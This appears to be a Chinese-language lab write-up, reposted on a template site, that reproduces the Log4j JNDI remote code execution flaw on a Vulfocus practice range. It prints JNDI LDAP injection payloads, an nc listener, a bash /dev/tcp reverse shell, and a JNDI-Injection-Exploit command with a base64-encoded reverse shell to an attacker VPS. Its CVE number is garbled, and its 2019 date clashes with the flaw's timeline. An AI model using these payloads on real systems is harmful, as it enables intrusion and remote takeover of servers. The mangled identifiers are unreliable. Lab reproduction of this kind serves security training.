700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > CVE--44228——Vulfocus-Log4j RCE漏洞复现

CVE--44228——Vulfocus-Log4j RCE漏洞复现

时间:2019-07-04 08:36:26

相关推荐

CVE--44228——Vulfocus-Log4j RCE漏洞复现

CVE--44228

漏洞描述漏洞评级影响范围VuofocusDnslog出网测试JNDI注入反弹shell

漏洞描述

Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的 重写,并且引入了大量丰富的特

性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能 而被广泛的应用于各种常见的 Web 服务中。

漏洞评级

Apache Log4j 远程代码执行漏洞 :严重

影响范围

https://fofa.so/static_pages/log4j2

Apache log4j2 2.* <= Apache log4j2 2.15.1.rc1

主流相关产品

Spring-Boot-strater-log4j2Apache Struts2Apache SolrApache FlinkApache DruidElasticSearch

Vuofocus

http://vulfocus.fofa.so/

启动靶场

Dnslog出网测试

/

payload GET方式提交

payload

payload=${jndi:ldap://X.X.X.X/exp}payload=${jndi:ldap:///exp}

用payload打的时候发现服务器返回404

原因是因为GET数据传输要URL编码

URL编码后提交正常

DNSlog成功回显

JNDI注入反弹shell

JNDI

/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

VPS监听端口

nc -lvp 7777

JNDI注入

替换JNDI中对应的payload

反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A [vps ip]

反弹shell命令进行了base64编码

https://www.jackson-t.ca/runtime-exec-payloads.html

反弹shell成功拿到flag

关注公众号了解更多安全资讯~

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。